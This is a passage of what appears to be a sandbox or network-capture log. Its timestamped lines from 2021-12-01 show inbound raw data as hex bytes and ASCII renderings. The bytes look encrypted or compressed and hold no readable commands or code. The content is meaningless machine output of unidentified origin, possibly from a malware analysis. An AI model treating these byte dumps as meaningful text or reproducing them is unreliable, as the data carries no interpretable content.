Ascii: _$-(+kZjdA<9cU"{nypzqb:~.#}am;~rm)K&>k<hCZ<?r@PeM4Rm %e]rdx"%:k;?LV2-\Qq{(P?5=1O;
2021-12-01 15:22:56 UTC	101	IN	Data Raw: 67 59 27 38 f3 4a 8f dc 10 ff 29 21 34 cb c2 4d 9b 02 f6 4b 06 15 7d 6e aa e1 f9 dd 83 41 85 5f 2a a3 7e e5 09 fa 2e 49 0f 9b 19 11 12 5a 4d fd 35 6a 17 c1 dc ef e3 f9 14 b6 aa 81 25 d5 da 64 f3 7d 61 df 0d 9e 74 e2 01 b3 fa 6f 16 1f b8 af 95 ae 8c d7 93 55 58 51 5a 3e e3 77 9e 77 9c b8 00 39 35 f2 a3 7c 4c 8e 41 10 fe d7 e2 77 63 b9 df 18 51 11 99 d9 6c 0e fc b2 7b c1 3f 9c 75 8f 48 d7 9f ed be bf bd 4a 34 da de d0 f0 d3 8a 69 5a a5 e0 13 0a 80 1c c8 38 ef ec c2 b5 a4 ee df 8b a3 e7 0d fb e4 11 8d a7 e2 99 e3 80 04 f9 2a a2 23 93 d8 eb a4 f3 30 1f ae 81 a6 fb f3 a5 44 f0 fe 43 8a d1 36 9d 60 5b 5a 39 bd 32 a3 72 6f 17 c4 0a ef b0 85 38 ed 46 8c 27 ac 1c 08 07 b5 23 26 ab 1f 48 68 1b f1 23 a0 7f 96 d6 86 25 58 e3 6b 78 18 1c c7 ca e4 ff c4 d7 63 ac 08 01 Data Ascii: gY'8J)!4MK}nA_*~.IZM5j%d}atoUXQZ>ww95|LAwcQl{?uHJ4iZ8*#0DC6`[Z92ro8F'#&Hh#%Xkxc
2021-12-01 15:22:56 UTC	103	IN	Data Raw: 60 d1 ef cf 80 93 b9 26 b5 27 b9 3c 7c 8c d4 e4 b7 d2 1c 2a c7 63 4e b9 34 d6 60 d8 1a c1 4d 88 ae 9c 9c b2 78 ef 58 df 17 f2 27 a8 1b df 79 29 2e 43 0f 06 a3 e4 15 8e ce 22 d9 d7 82 2b cb c0 ce f0 39 ea a2 bd c5 eb a9 81 8f da e4 01 ff 96 39 fa 53 35 2e e6 99 5d 47 d9 65 be 6e fe ca 37 bc 5c 52 e0 63 53 35 f9 29 20 cf e7 1e 38 90 a9 f8 a2 ef 58 a4 57 a3 d5 7d 10 2d d3 33 6b 04 fd cb de 7f 25 3f d4 38 70 7e 8a c2 76 7f 43 01 d9 fd c2 4a 81 31 38 6d 86 d1 32 6d 0d 66 c7 c1 aa 7d 10 84 d7 f8 df 98 de f6 48 7c ee c8 3c 83 58 e8 9a 21 b6 b6 20 5d be 3d e8 26 31 54 25 a7 e7 8e d5 fb 7b 9e 78 0c 02 09 12 10 73 62 c6 54 d1 6a 0b 92 a4 f6 11 64 aa 4d b0 1b 34 cd b1 e3 14 ec b9 0c 7c 13 8b a3 7e 83 bb e5 60 45 e8 a9 e2 ea c2 9b eb b0 8d ac 10 7b 70 57 d4 cc 19 60 Data Ascii: `&'<|*cN4`MxX'y).C"+99S5.]Gen7\RcS5) 8XW}-3k%?8p~vCJ18m2mf}H|<X! ]=&1T%{xsbTjdM4|~`E{pW`
2021-12-01 15:22:56 UTC	104	IN	Data Raw: 29 44 dc 1d bc af ec 74 20 71 60 dc 98 24 26 b0 00 d8 fc ba 35 de 54 b1 0c fe b5 ad 8e 12 15 88 2a b9 74 3d aa 9f fa d9 fb 58 ed bb 37 fc db a5 e0 ea 74 27 dc 17 8d 64 ce 3d f7 4a d2 b7 22 2d d5 9c 9c 3e cd 02 f0 30 da 3d ed 50 f4 e7 ca d1 7b 14 7f 63 51 02 1b 2a ca b7 33 c6 df 70 07 02 57 17 92 53 a8 19 16 41 14 1b a4 f4 35 e3 73 2f 66 85 b4 b1 80 fb c1 ae fb d6 96 4c 8a ad 7d 96 45 7f 60 44 1c 2d 3c fc dc 57 24 2d d5 92 13 8a 6c f3 ac 1a 61 d9 28 58 bf 20 a2 57 2d 2b 9a 42 e0 1d bc 3c f6 13 90 5d 5b b1 7c 7a 59 2d cd d2 c1 49 1a 6a 1f 2e ca be a7 e0 1a e6 9b a9 54 bf 23 af f4 15 b3 71 64 cf e7 00 42 ea 36 76 02 65 21 a3 12 5b 6f 22 34 4c 14 96 0e e5 ca e6 40 6c e6 9e 1a 1f b7 03 80 91 23 d5 95 57 a5 93 df 94 44 60 97 92 17 8f d8 76 88 a3 a9 01 40 66 52 Data Ascii: )Dt q`$&5T*t=X7t'd=J"->0=P{cQ*3pWSA5s/fL}E`D-<W$-la(X W-+B<][|zY-Ij.T#qdB6ve![o"4L@l#WD`v@fR
2021-12-01 15:22:56 UTC	105	IN	Data Raw: 0a f5 5d d0 f2 b5 a8 95 a2 e2 2e c4 d1 70 eb 73 e9 2d fb c5 4a 86 40 48 c6 c8 ca 50 70 eb 74 e3 45 a4 fe de 3b ec 34 45 f3 58 e1 cb a1 e8 33 49 8b a8 5c d2 7b 0d 5e 39 7f 7b a8 6a 27 ac 51 35 33 c6 d4 e8 24 e1 9c bf 23 63 56 46 1c af 2d ce fa 5c 32 9b fb 36 3a f5 b3 07 73 fa 39 00 58 96 9e 79 63 da a4 89 cf f1 5b 11 4a 8e 96 5a 47 ee 62 63 71 6b 73 ff a8 89 96 4c 85 bb 3c 9c eb f2 ca ac d8 31 e0 92 94 f4 71 ef 21 a9 ca 93 b8 53 ca 58 e7 07 35 fc 59 31 c4 2b 66 ae 4b 1e 2e 41 05 90 c3 df 93 d3 72 ee c9 8c bf bb 29 db 9b fa 1a 18 7a 12 12 8c e5 91 52 de 0c 61 9b 4a 99 1d bd f7 3c b2 9a d0 a7 e7 80 07 75 63 bf 5f a4 29 d6 f5 4e 8a 3e 2d 4f fc 51 b2 00 c7 57 23 b0 64 36 30 c4 98 40 66 57 b3 10 1d bd 24 ca 8d 0e 5d 57 32 75 67 50 a3 ef 64 59 07 f1 a2 6a fd ce Data Ascii: ].ps-J@HPptE;4EX3I\{^9{j'Q53$#cVF-\26:s9Xyc[JZGbcqksL<1q!SX5Y1+fK.Ar)zRaJ<uc_)N>-OQW#d60@fW$]W2ugPdYj
2021-12-01 15:22:56 UTC	107	IN	Data Raw: 79 84 37 e1 16 68 04 38 79 16 87 b5 3a 7a 0b 94 df 6c eb 4d fc 74 b3 04 e9 bb b6 d9 6f fd a2 b7 95 42 07 7e 13 88 28 bc ea 66 84 3d eb 26 7e f8 45 14 1e 3a 43 fc d0 70 e6 1c 39 fe a2 94 07 2a 2e 4a 8a bf 10 06 06 ca ce fa 56 ac 61 d6 aa 69 12 8e d8 4e b3 04 f6 a1 13 da aa 87 b6 ba 27 94 5b ab 2f ca cc c5 52 47 89 eb 47 79 fd ff eb 48 0f ad 08 67 4b cf e4 f8 c1 12 f7 43 c5 4f a4 52 ec 23 ab 18 14 ce 33 53 5d 0a e4 01 4e a5 3f 1e df 76 55 1f 52 ac 9f 66 13 81 7c 0a 29 3a 87 59 b9 b9 86 46 ac 5c da ee f3 a5 2d da 01 be ea 7d 45 19 86 ae e2 a7 7b b8 6e f7 32 bd 16 de 0c eb af 95 ae 8c e3 85 62 cc 3e 9f b5 0d b8 b0 8b 66 c7 91 3a 88 db e5 b0 5b 50 a6 f1 92 b2 13 12 b9 2a 49 12 e0 2b df 8d ad 14 e1 7a 7d 31 f1 55 d1 4b 53 6a e9 1d 81 e3 76 82 42 1b f2 24 2f c9 Data Ascii: y7h8y:zlMtoB~(f=&~E:Cp9*.JVaiN'[/RGGyHgKCOR#3S]N?vURf|):YF\-}E{n2b>f:[P*I+z}1UKSjvB$/
2021-12-01 15:22:56 UTC	108	IN	Data Raw: 60 1f 2a b7 c2 59 6c 01 22 48 83 a0 77 96 97 d3 86 e8 bd 33 8e ea 22 22 2b 4b 6a e5 73 52 b5 33 d0 fa a4 a2 e9 58 48 1f f0 c1 36 eb af 09 b4 42 02 7e 7e b7 3a 76 8a 3a cd d5 8f ce 02 6f f8 b8 32 5f 52 22 b3 1d 57 ad 8f 0d 7c fa 22 95 b5 3f e3 19 d8 db 2a 57 3a e5 06 e5 86 40 87 23 3e 2c e1 80 12 ed 21 51 b9 34 b3 4c 66 b5 39 f5 4d 9a 75 3a 72 e2 1d 29 cf f9 b8 53 96 25 61 c6 4c 0f 81 47 60 df 91 d5 6a 0e d2 6a 17 72 60 9d 0c 86 d0 3b 04 13 63 ec 17 93 de 33 05 a6 19 eb 40 f0 6e 77 d9 71 9c 81 49 96 d9 f4 c1 c4 8a 7b ec 5e 76 10 54 ae 26 e1 45 76 4d e8 17 79 ac 9e 26 72 57 18 00 7c df 08 36 23 fb b6 b6 22 f9 e5 33 e4 12 c9 49 6a 86 5c 76 0f 27 d3 2e 76 4d 26 1d a4 9a 16 7e 7d 0e ba 42 0c 2d 98 b1 a6 3e 1e a7 a6 2f 7b 0a 68 f3 07 49 f0 03 cf e2 b8 2d 24 ba Data Ascii: `*Yl"Hw3""+KjsR3XH6B~~:v:o2_R"W|"?*W:@#>,!Q4Lf9Mu:r)S%aLG`jjr`;c3@nwqI{^vT&EvMy&rW|6#"3Ij\v'.vM&~}B->/{hI-$
2021-12-01 15:22:56 UTC	109	IN	Data Raw: 17 e5 70 d4 4e 40 f7 9c 84 a9 c6 c7 c1 3e 41 0c ea 24 39 33 d4 76 8d b6 54 5b 2c 6b 2e 44 82 ae e4 1d 4d f7 b2 14 eb a8 18 b4 a4 fe de 02 53 28 51 2d d6 38 7d 24 2d d3 7a 08 38 99 5c b3 db 76 8b 2b 34 b3 fe ba 40 17 0c fc 4e b2 01 2c 4b e5 6e 84 8f d5 6a f5 d8 3a 6d c1 45 0c e5 8b 6e 03 e1 e7 41 00 4f b6 58 5d a1 1b 50 c8 c5 64 c3 40 f1 cd 53 c6 24 42 fc 39 e2 b2 92 07 ab 29 e5 37 49 36 3b 2c dd 73 ec 71 f3 26 22 a0 ad fb c9 4e b9 34 9b 0f 19 0b 7d 10 97 a1 ee 28 50 16 ed 5a 6c 62 5f b6 5e 57 b5 0d d6 ed b5 ac 1f a9 82 ce 15 13 0d 0c 5d 43 1c a5 74 fb 56 5a 58 3a e3 eb 1a 0d 64 5d d5 75 0c 02 18 91 54 c0 13 9c 67 db 37 e2 c5 4f ae 19 e6 ae 8b a5 13 6a 32 40 29 e3 8b a3 ee b0 ea 3a 80 6b fd 28 dc 63 bc c8 51 28 c8 fa 47 a9 6e 1d 37 b1 9d be 45 ea a9 c6 cb Data Ascii: pN@>A$93vT[,k.DMS(Q-8}$-z8\v+4@N,Knj:mEnAOX]Pd@S$B9)7I6;,sq&"N4}(PZlb_^W]CtVZX:d]uTg7Oj2@):k(cQ(Gn7E
2021-12-01 15:22:56 UTC	111	IN	Data Raw: a4 bb 38 97 a5 70 c5 57 2d d2 fd d0 f5 d8 ae f1 e2 09 6f f2 47 1e ad 8c 50 bd 25 bf bf 19 44 8c d7 11 14 d4 ef a7 02 b8 50 92 53 36 e2 60 cb 81 ad a1 e8 33 25 e0 f4 23 a4 7d 11 f3 aa 18 99 dc 05 6f 60 24 d8 8c 13 2e 1e d3 70 1e ce 6e a4 87 2b 3e 79 0a 6c b4 ab 06 ea c6 cc cb bf 28 5b a4 de 78 89 20 2b 66 db 08 d0 2a 05 8a 32 07 6c 8a 38 ec 68 48 8b a5 ed a8 04 30 e7 87 0a 99 51 aa 8c f4 30 bd 27 75 91 fe 40 6c 0f 02 70 fe c6 55 26 b2 27 e5 5d 27 a7 e4 96 c1 46 1c 0b 65 13 9c 67 d3 47 0e 8e 6e f8 db 8c 3a f4 48 86 f5 b7 83 b2 7f 19 44 46 0b a9 dc 57 5d a7 fc 47 f6 15 e5 18 01 4f d0 8b 7f 64 c0 b8 7e e8 c3 65 f7 6b 71 66 31 bc d4 6a f7 c4 27 d3 97 63 50 bd da 99 62 33 c1 57 cd 04 c1 5c db 9a ba 8f ff cb 54 b3 f9 94 19 8e 44 9e 84 4b 53 3c 7c 15 74 ac cd 59 Data Ascii: 8pW-oGP%DPS6`3%#}o`$.pn+>yl([x +f*2l8hH0Q0'u@lpU&']'FegGn:HDFW]GOd~ekqf1j'cPb3W\TDKS<|tY
2021-12-01 15:22:56 UTC	112	IN	Data Raw: e9 bd 21 71 7b 17 10 fa dd 8e 14 1d 29 50 46 1d ad 93 b5 24 24 35 ff 5a 5f 5a 39 fa 42 55 30 da af 87 6e e5 14 ec 31 07 7e de 0f 99 c0 b1 e5 1c b5 37 1e f4 59 ed 53 3c 6d 72 1a f3 d7 0b 3e 61 41 9a 2c bb a3 80 d1 6d 89 41 ad 25 53 a2 26 d7 01 d6 1e cd d5 e6 18 e1 44 82 fc 44 17 0b 61 a1 61 59 e7 88 f0 25 67 42 65 a0 89 50 f0 68 ae 8d a6 f3 8d 0a 4d 78 85 de 02 a8 a0 98 b3 f5 42 ab 8d e8 cd 28 ad 9c 0f 40 a6 89 50 31 17 9f 24 b8 e6 e6 df 69 e3 ff 21 51 cc 5c 17 94 8d 2c ab 5b 4b 60 d3 7c 89 72 0e d6 e6 f5 ae 94 22 37 ff 5c 3e 96 88 c5 a1 9d fc 2a 5b 59 b0 03 68 38 78 ff 3f 24 26 f8 59 f0 3b e0 0b 79 5b 4e 61 4a 4d 09 b5 31 23 c0 bd a2 6a fe 47 89 6b 6d b1 09 8f 99 6b 4d 0f 86 ab 72 72 61 7b 57 3b 07 8e e5 b4 4c 72 8f 4c 97 01 52 71 88 dc c0 ad f5 23 ed 1b Data Ascii: !q{)PF$$5Z_Z9BU0n1~7YS<mr>aA,mA%S&DDaaY%gBePhMxB(@P1$i!Q\,[K`|r"7\>*[Yh8x?$&Y;y[NaJM1#jGkmkMrra{W;LrLRq#
2021-12-01 15:22:56 UTC	116	IN	Data Raw: ab fe 5f 85 d7 f5 09 c0 a7 3a 1d 28 9f 5c db 4d 6c 67 89 0a e7 47 20 a2 af b6 bf fa 63 cc 1c 86 31 1d 9c ba 05 e2 86 57 ec 34 b0 bc 2b bd 2f 8b 35 c9 44 88 a2 93 e0 de 15 7e 49 ea 5a a5 e3 18 8b 9b 0d 9e 49 ff a1 e0 08 77 fb 30 d4 6c f0 ad 25 b5 a9 d5 62 cb 47 d0 78 e8 02 6f 95 df 97 58 2c 5c 31 1a 07 b8 af f5 2e 36 d1 86 30 42 1b df 75 21 d5 f4 6a ed ea 59 c1 c5 df 15 62 35 70 83 23 d2 01 21 d8 e4 dc 6d 34 9e 22 1a 5b 69 85 24 6c 6a b2 21 50 46 65 ce 20 38 e5 b1 d4 f0 26 33 12 10 05 7e 1e c0 ce 70 e9 bf 3e 60 d3 35 3a 44 9f fa db 60 24 90 64 4d 6d 66 32 bd b5 b2 e0 91 57 4b 9d 72 8d 3e ec 4c 13 0c 9d 67 c2 90 cc 55 5b c8 5b 17 12 89 b6 5e 2f 03 63 ba 7e 6d fa 39 e0 00 ae 0c d3 71 58 e4 77 94 55 bc 27 35 65 21 a3 12 ec 33 a8 19 b8 a3 74 7c 08 e8 3a e7 76 Data Ascii: _:(\MlgG c1W4+/5D~IZIw0l%bGxoX,\1.60Bu!jYb5p#!m4"[i$lj!PFe 8&3~p>`5:D`$dMmf2WKr>LgU[[^/c~m9qXwU'5e!3t|:v
2021-12-01 15:22:56 UTC	120	IN	Data Raw: 92 52 a5 eb ac 01 a3 4a 0f f6 45 e2 7e f2 1c 3e 60 41 8b bd 3e 69 69 bf 23 31 57 55 d6 12 52 d4 ca c7 40 ec 6d 6e f1 be aa 62 86 8d 82 3b e9 a5 d8 6e 76 04 e0 0d 6d fc d7 7a 1d be a9 ea 4a 21 8d a9 02 66 54 ae 9f f0 2f 2a a6 94 34 4b 3c 62 d1 e4 32 e8 ae e5 58 be 71 66 3d a5 74 df 9b f8 c8 a1 f3 54 44 6d e8 7d 78 7f e3 5b 80 ec ef 7a ae e2 07 3b 3e d9 e1 cc 90 af 9e 31 41 5e 8e 47 11 99 2d 29 24 ef af 01 5a a7 7b 09 ae 84 2b cc 01 43 f3 93 52 b8 b7 3f e0 17 e6 8f d6 e6 68 64 03 62 c2 c5 53 75 05 57 27 b0 59 39 f1 af 15 14 80 de 13 95 c8 0d 60 22 1a 9f 32 49 14 1f ae c1 ed ef ab 19 04 13 83 07 46 1d 67 5d ba 70 ef 56 54 db 0d ae 8e 5a ac 3f 24 fe 80 64 4f e2 00 d1 6d ae 4e 6a e0 84 a0 a6 66 c4 d2 6a 74 6e 64 47 8b 31 57 bc 28 d4 75 1e bc 34 7a 84 60 30 8c Data Ascii: RJE~>`A>ii#1WUR@mnb;nvmzJ!fT/*4K<b2Xqf=tTDm}x[z;>1A^G-)$Z{+CR?hdbSuW'Y9`"2IFg]pVTZ?$dOmNjfjtndG1W(u4z`0
2021-12-01 15:22:56 UTC	121	IN	Data Raw: ab 0c eb 2c 3b 66 00 d9 a3 08 75 1a 02 ff c9 54 42 7c 43 98 15 89 a7 37 fc 89 48 13 b1 0b 67 41 1b 45 e8 02 43 3e 76 1b 2c c7 cc ca d1 72 0a 9a ec 19 93 cb 5c ee c7 dc 82 b8 b2 80 05 8e 61 b8 93 c0 a2 fc 97 c0 6a e3 74 7b a8 1a 0b 75 87 4a c5 85 ee 22 28 c9 d1 f3 a1 eb b4 50 c1 5b 01 4e a3 d0 16 0d 6f 76 83 de b1 d5 d0 af 88 e4 0e 19 82 e7 55 e0 ae dd 97 de 16 0f 4f c9 d2 7b 08 e5 9c 7f 75 e4 41 3e 64 c0 2f b8 2f a3 f1 68 61 15 00 4c 93 d2 f0 e0 0d f8 d2 f2 2e 56 af e2 89 27 25 a3 e1 95 3f aa 4b 27 a4 61 8f dd 50 45 83 e3 04 e1 80 1b 47 e5 f6 93 6c e4 1e ad 61 a3 6e d4 37 ea aa 01 c6 d0 fb c3 a9 e3 b5 67 5b 51 2e d6 89 a9 89 31 57 34 46 93 24 5a 7e 26 21 a8 86 06 15 19 d1 e5 83 be ab f5 98 1d 94 41 05 b6 b5 b8 31 42 9b f5 c7 a4 83 f1 cf 23 ac 94 db 05 e4 Data Ascii: ,;fuTB|C7HgAEC>v,r\ajt{uJ"(P[NovUO{uA>d//haL.V'%?K'aPEGlan7g[Q.1W4F$Z~&!A1B#
2021-12-01 15:22:56 UTC	125	IN	Data Raw: ad 24 de 9b f4 2e a5 06 61 07 f8 2b da fc 49 0c 1b 40 db ae 49 1b a2 6b 78 eb 2f 43 0a ee 37 fc ba 6b f6 c2 c7 51 2d de 58 1d e4 03 7d 19 0e 01 c5 8c 30 d3 bc bf a1 84 22 a8 92 b1 04 7c 9f f7 d0 e0 da e5 40 64 59 79 8c 2b db 8f 20 cd 06 73 37 e1 8a b9 06 e4 c3 d5 00 df 9e 7d 93 de c9 a5 25 a1 2e 57 bc 38 7c 06 f7 d5 90 ad 62 00 91 ce fa c0 9a 49 c9 49 96 c6 c6 de 17 8c e0 b9 ca 82 cf 58 a5 e2 9d d6 fa df cd c3 58 a8 91 c4 31 3a 3d 50 98 4a 8f 19 84 fb 25 37 64 de 0d 61 4b e9 5f 11 eb 10 14 0a 71 03 8b b4 c1 bb 19 91 a2 f0 b0 6f 7f 82 3a ad 0a 64 e7 87 a8 81 b3 18 da f2 a3 e7 55 82 d4 54 82 c6 5c 9e 81 d1 c4 7c 1a 06 f2 f0 97 0c e3 11 1e 23 b9 36 76 ff 3b a6 7f 71 62 ce 69 4f 24 b4 26 a3 f9 d5 6a 65 78 d9 1c a4 5b 46 86 29 dd 97 b6 d4 7f 47 1d bc 54 2d 3b Data Ascii: $.a+I@Ikx/C7kQ-X}0"|@dYy+ s7}%.W8|bIIXX1:=PJ%7daK_qo:dUT\|#6v;qbiO$&jex[F)GT-;
2021-12-01 15:22:56 UTC	130	IN	Data Raw: b0 8e 80 59 a6 ed be 3f e0 8a cc dd 76 02 87 28 94 46 01 cf 70 64 dc 89 57 37 1d bc d1 e1 0c 16 0b 0e e1 60 e1 94 49 05 6c 07 e9 c5 be cd 00 bb b5 14 ef 39 b7 bd 6a cf 7d 87 a2 93 2e 86 9d 60 44 1f 7d 93 34 26 bf bd 2c 18 55 ac 9f f1 30 c9 cf bd 37 07 36 af 52 b2 8a a3 3c 6e 7c f8 cf 84 a8 a4 9a be ea 68 79 9c 7d 1c 7c 97 a3 09 f7 a2 a4 7e f3 58 2d 93 3a 1b 48 5d 81 36 8e 85 77 9b 31 de e6 fc 00 5c 74 e6 05 e0 cd 47 da e3 2c 4d 19 5e d1 be bc 50 4e 36 79 dd 47 b4 a6 6e 23 30 63 fd 45 d5 6c 3d fb 31 3b 79 05 66 b0 41 bd 33 c5 93 63 d6 0f 14 df 8d 6a fc b5 c1 c2 50 a5 af 87 0e 1c 3b 7f ab fb 1d e8 22 30 6f a4 77 46 96 b5 ce 7e 81 ae c5 e9 13 94 48 46 18 7b 89 fa 99 df 5f 4e 45 e0 92 d9 7c 75 28 f7 db 96 94 f1 3b 66 28 cf f6 6f aa 96 b9 59 a8 a0 6d 34 0c 79 Data Ascii: Y?v(FpdW7`Il9j}.`D}4&,U076R<n|hy}|~X-:H]6w1\tG,M^PN6yGn#0cEl=1;yfA3cjP;"0owF~HF{_NE|u(;f(oYm4y
2021-12-01 15:22:56 UTC	134	IN	Data Raw: 58 81 bf 2f 4a e8 20 c0 55 16 0c e3 8b a8 7b 1a 4a 75 af f0 c0 19 be 48 1e 74 02 c8 af f5 42 e3 19 c1 84 81 8c d9 f3 51 21 46 07 ac 89 20 c5 5b e6 6a 1b 2e 93 d2 74 69 e1 1e a2 f5 41 91 41 82 b7 61 d7 ea 12 8f 57 72 60 52 9f 39 64 5e fe d1 eb e7 1c b3 6f ec b3 64 53 b9 4a 16 80 78 81 21 d7 f6 d8 92 c1 c9 0a 7e 91 91 41 83 ad df 0e 9b ed 24 a1 dc 85 3d da 7e 8a 49 d2 6e 64 ad 9a c1 5d 94 d8 7b c2 18 8f 41 23 3c e1 7a 02 8d 5b a7 7d 0b 69 ed 28 50 af 0b 68 7b 0e 01 d3 f6 5e 2e 29 47 91 d2 9d 7d b9 26 26 21 a8 ed 3b 96 5e d9 67 43 77 1a 52 58 bc 63 44 a8 16 21 63 53 eb b5 59 b6 91 0a eb 71 63 24 a3 d6 3b fc 85 b2 13 74 f8 d6 73 74 ec 34 4f 45 0d bc a8 95 43 89 b2 90 5e d3 b3 19 17 7c 35 9e 33 33 4b 1e f4 a7 a7 9d 25 aa 88 f0 36 84 79 75 c2 da e1 17 e1 69 e3 Data Ascii: X/J U{JuHtBQ!F [j.tiAAaWr`R9d^odSJx!~A$=~Ind]{A#<z[}i(Ph{^.)G}&&!;^gCwRXcD!cSYqc$;tst4OEC^|533K%6yui
2021-12-01 15:22:56 UTC	138	IN	Data Raw: b7 bd a9 09 92 cf ea 37 16 8c bb 72 06 fb d7 85 31 f5 8b 42 9b f9 2c 1e 62 51 39 1a c7 b6 37 6c 59 2e 48 81 3a e4 0a 15 64 46 05 d4 fa 57 2c cb bb 27 ea b9 af 02 17 4e 5a 2c c0 14 1d be a9 9e e3 87 4c 6d ff 52 0f 89 ac 97 57 d5 64 80 ce fe 42 90 da e5 79 4f db 13 07 b3 05 6f 69 ed 35 ec c0 45 80 9f 01 51 30 4b 91 3f ef e3 78 09 64 d1 ee 29 21 bb bc 6a e2 0a e9 24 a3 b9 21 ad 16 9a ca c7 ae 61 ca 51 6d 68 e2 00 41 e3 8c 57 8f d0 ea 22 b1 fe 46 1d 4f d1 e8 47 07 eb b6 be ab 07 e5 dd ee 29 d7 72 7e 76 12 8e 15 98 5f 52 02 f5 c4 c3 5f 8d be 9d ff c3 43 14 9b 71 58 37 ed af 83 2a 92 ea 84 37 35 fe d6 7f 49 b6 05 73 a7 e7 11 6b 79 6d 9e f3 ba 28 60 db 6c 12 d4 e1 52 b2 4c 94 b7 c6 9e cc 5d 55 28 cb 52 4f c1 60 e8 b4 ad 12 85 37 8d 32 70 4f c2 35 0e 87 ce 15 e6 Data Ascii: 7r1B,bQ97lY.H:dFW,'NZ,LmRWdByOoi5EQ0K?xd)!j$!aQmhAW"FOG)r~v_R_CqX7*75Iskym(`lRL]U(RO`72pO5
2021-12-01 15:22:56 UTC	142	IN	Data Raw: fa aa 84 3f 74 fa 41 81 a8 5d 56 48 63 39 c5 a0 6b 71 6b 7d 0f f6 4d 96 49 19 72 17 7c 9f b8 40 0d d8 bf fd 6a 60 14 f4 d2 e0 88 ce e9 23 68 0b f6 d6 f3 ba 2b c0 bc 28 4e 7e 1c dc eb cd d3 8e 50 a6 f1 a6 78 87 85 a6 f2 2e 4b f7 2b 2d 5f 16 fc 25 37 1d 44 1f b3 11 5d b9 a3 68 0a 72 7b 64 51 d7 7f 6a 7e 92 45 e8 ca 30 0f 44 9c 7f 83 23 c6 c3 a0 93 22 bd 6d 9f 90 d6 67 af 96 44 8c eb 4c 16 f2 c4 59 a3 03 ee ad 05 8f 4c 7f 9e 85 48 76 5c 25 af 15 88 bf 11 80 f9 33 28 cc 8c d9 56 32 cb cf fb c3 47 cf 9e ef 44 73 f2 a6 92 cf e2 1a f0 a4 9a 5b af eb 4c c8 ae 9e 79 95 50 d6 fe b4 48 7c 95 8d 50 d3 cb 2b 00 7c 9d 2d 23 3a 64 4f a1 fa c4 0d 94 d6 12 0f 85 26 3e 7f 09 71 b2 9b 06 1c 49 47 f0 2f c2 59 3f f7 57 1c 2d 4d 13 90 a1 1a f0 b9 79 67 29 6d 4f f4 f8 c5 81 4b Data Ascii: ?tA]VHc9kqk}MIr|@j`#h+(N~Px.K+-_%7D]hr{dQj~E0D#"mgDLYLHv\%3(V2GDs[LyPH|P+|-#:dO&>qIG/Y?W-Myg)mOK
2021-12-01 15:22:56 UTC	146	IN	Data Raw: c6 5a b1 1e f5 df 5b c2 45 42 97 ca cf 79 6b 8c 64 72 69 7f 89 28 3f 55 be 35 ef ae 82 2e b7 c5 19 82 af 00 c7 c7 c3 fd a2 84 39 fd 44 e8 26 d3 07 45 88 28 50 67 46 5b af 80 55 26 2e 55 22 d7 91 e8 31 4f 38 74 7b 01 4b 04 f5 c2 31 48 bd 88 d8 e2 03 93 a0 26 a7 e8 24 e3 8e 9b 07 e0 82 32 41 12 04 05 8a 6f 2d 53 2b d3 e3 bf 80 98 69 6a f9 d3 79 75 69 35 d0 75 99 c5 c7 cd ec 8e b1 00 cc 40 03 7d 6e a8 4a 09 64 d8 63 20 29 23 40 9a d2 cb b3 6e f6 6b f0 d2 05 b6 79 b6 3d b8 55 bc e0 8a 6c 4c 89 b2 81 40 91 36 c7 c5 c7 c7 dc cb 66 37 98 fd 97 ea 1c b6 23 2c 91 14 d7 71 57 7f d1 7e 64 c8 0d 63 6b 30 7d 7a ee 89 4e c4 87 37 a0 53 4f 76 2e f9 9d 30 0d e9 f6 44 82 2b a9 33 e0 c9 97 1b 1c c8 91 07 73 29 e3 a8 7f 4e 67 8e cd 51 ed a2 92 f6 7b 20 e9 5a 38 51 03 62 5c Data Ascii: Z[EBykdri(?U5.9D&E(PgF[U&.U"1O8t{K1H&$2Ao-S+ijyui5u@}nJdc )#@nky=UlL@6f7#,qW~dck0}zN7SOv.0D+3s)NgQ{ Z8Qb\
2021-12-01 15:22:56 UTC	150	IN	Data Raw: 97 0c e3 43 06 01 a2 f3 21 55 12 dd a6 78 10 8e bc 7b 39 5f c6 b9 f0 2f 0c e5 74 6b f8 fd 3f 91 21 e9 be ab c5 ae f6 c9 c6 10 19 12 81 18 94 57 e8 39 14 ef e6 bf 6a f9 d7 f1 a9 de f6 cf 46 9b 3e 68 29 c2 27 5b cf e8 96 04 5c a5 e2 09 f3 cc 2c df 1a a5 1b db 93 c8 cb 48 67 b5 5c 72 8f 2a a8 f5 23 95 31 27 9e 8a 05 8b 30 01 cd 09 df 61 c4 01 42 06 f7 18 1a b0 e8 d7 fa 1f 4e 8a d8 18 c3 ef 3d 63 7f 42 93 21 c5 de 2b ca 8d c2 66 cd 5b cc 48 ef 72 f4 a2 2d 5d e5 80 00 50 44 ad e9 2f 11 61 b4 80 3f 5a ae 97 59 54 35 91 3c e1 c0 b7 a7 61 57 24 2d 1a 06 2d d7 6f 96 0d 0a 57 2f c2 57 65 c0 ca de 91 da fc c7 e8 39 f0 21 21 2f dd 0c 19 9f 13 00 46 85 59 df ab 5f 74 ef b5 f2 28 e3 18 42 4a 90 9b fd 3d 08 7b d8 c4 d1 73 64 f7 45 64 d9 63 84 89 53 ea 74 21 a1 6c 69 49 Data Ascii: C!Ux{9_/tk?!W9jF>h)'[\,Hg\r*#1'0aBN=cB!+f[Hr-]PD/a?ZYT5<aW$--oW/We9!!/FY_t(BJ={sdEdcSt!liI
2021-12-01 15:22:56 UTC	153	IN	Data Raw: c3 a4 02 e4 03 b3 f4 be 3a ff 4b 74 6b 06 f2 20 f1 46 0d ed 4a 63 06 44 fd d6 e5 58 44 6e 6c 7e f9 aa 3c 1c 3c 67 9e d7 95 56 21 66 8c 82 51 3a 60 16 a6 94 ca 49 d4 a0 9f db 9a 4c 53 80 ff 5e 52 6d 34 a8 f4 5b 59 e2 a3 13 05 e9 65 7a 09 5e d8 fc d2 97 61 8f 7a f9 53 ba 6a b8 a8 ff c2 dd 59 81 41 81 33 19 f8 16 60 df 8b 6d cc 3d 7e 87 37 f7 c8 d4 a1 a2 0a f3 ad d3 d2 0b fb 52 2e 4e b1 15 c1 24 4c 9b f1 7a b4 49 88 b3 95 dd 80 07 3d 8d 92 5b 58 63 ed 4d 9e eb 23 a4 75 9e 49 3d d9 6c ed 70 45 f7 46 06 73 7b 8b a5 a4 3a 13 94 4e 7f 3e 99 5d c2 8d b3 01 47 57 00 a0 68 fb 5f 61 fb 06 5f b5 a1 76 7b 97 c4 d2 bf b7 52 b0 8d 67 f7 32 df 09 32 59 2f d6 a5 38 40 66 cf ab b9 ce 64 5a 89 a7 e5 87 8f 19 ef a8 